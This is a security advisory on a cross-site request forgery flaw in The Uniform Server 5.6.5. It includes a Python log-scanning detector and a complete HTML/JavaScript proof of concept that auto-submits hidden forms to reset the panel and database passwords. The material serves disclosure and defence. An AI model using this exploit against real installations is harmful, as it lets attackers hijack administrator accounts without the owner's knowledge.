Affected systems:
Uniform Server Development Team The Uniform Server 5.6.5
Description:
The Uniform Server is a WAMP package that runs on any Windows-based operating system.
The Uniform Server allows users to perform certain actions via HTTP requests without performing any validity check. A remote attacker can carry out a cross-site request forgery attack by sending POST requests to scripts such as apsetup.php, psetup.php, sslpsetup.php and mqsetup.php, changing the administrator password.
<*Source: John Leitch
Link: http://secunia.com/advisories/39913
*>
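As an added defender-side example (not part of the advisory), the following Python flags POST requests to the four password-changing setup scripts whose Referer is missing or points at a host other than the admin panel's own, using constructed Apache "combined" access-log lines; the panel host name "localhost" and the log lines are assumptions for this example.

```python
import re
from urllib.parse import urlsplit

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The password-changing handlers named in the advisory (all served under /apanel).
SENSITIVE = {"/apanel/apsetup.php", "/apanel/psetup.php",
             "/apanel/sslpsetup.php", "/apanel/mqsetup.php"}

def suspicious_posts(lines, panel_host="localhost"):
    """Return (ip, path, referer) for every POST to a setup script whose Referer is
    absent ("-") or names a host other than panel_host. A missing Referer is
    flagged as well: a state-changing POST to these scripts should always come
    from a form page served by the panel itself."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = urlsplit(m["path"]).path      # drop any query string before matching
        if path not in SENSITIVE:
            continue
        ref = m["referer"]
        ref_host = urlsplit(ref).hostname if ref and ref != "-" else None
        if ref_host != panel_host:
            hits.append((m["ip"], path, ref))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    # legitimate change submitted from the panel's own form page
    '127.0.0.1 - - [20/May/2010:10:00:01 +0000] "POST /apanel/apsetup.php HTTP/1.1" 200 512 "http://localhost/apanel/apsetup.php" "Mozilla/5.0"',
    # same POST, but the Referer is a third-party page (cross-site form submission)
    '127.0.0.1 - - [20/May/2010:10:00:02 +0000] "POST /apanel/apsetup.php HTTP/1.1" 200 512 "http://evil.example/lure.html" "Mozilla/5.0"',
    # Referer absent entirely
    '127.0.0.1 - - [20/May/2010:10:00:03 +0000] "POST /apanel/mqsetup.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # a GET of the form page is not a state change and is ignored
    '127.0.0.1 - - [20/May/2010:10:00:04 +0000] "GET /apanel/psetup.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, ref in suspicious_posts(SAMPLE_LOG):
        print(f"suspicious POST from {ip} to {path} (Referer: {ref})")
```

The Referer header is only a triage signal, since browsers and proxies may strip it; the actual fix is for each setup script to require a per-session anti-CSRF token on every POST.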
Test method:
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use it at your own risk!
<html>
<head>
<script type="text/javascript">
window.onload = function() {
    var url = 'http://localhost/apanel';
    var xsrs = [
        {
            "action": url + "/apsetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "apuser", "value": "new_username" },
                { "name": "appass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        },
        {
            "action": url + "/psetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "puser", "value": "new_username" },
                { "name": "ppass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        },
        {
            "action": url + "/sslpsetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "puser", "value": "new_username" },
                { "name": "ppass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        },
        {
            "action": url + "/mqsetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "qpass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        }
    ];
    for (var x = 0; x < xsrs.length; x++) {
        var attackFrame = document.createElement('iframe');
        var html = '<html><body><form action="' + xsrs[x].action + '" ' +
            'method="' + xsrs[x].method + '">';
        for (var y = 0; y < xsrs[x].fields.length; y++) {
            html += '<input type="' +
                (xsrs[x].fields[y].type != null ?
                    xsrs[x].fields[y].type : 'hidden') + '" ' +
                'name="' + xsrs[x].fields[y].name + '" ' +
                'value="' + xsrs[x].fields[y].value + '" />';
        }
        html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';
        document.body.appendChild(attackFrame);
        attackFrame.contentDocument.write(html);
    }
}
</script>
</head>
<body>
</body>
</html>
Recommendation:
Vendor patch:
Uniform Server Development Team
-------------------------------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version: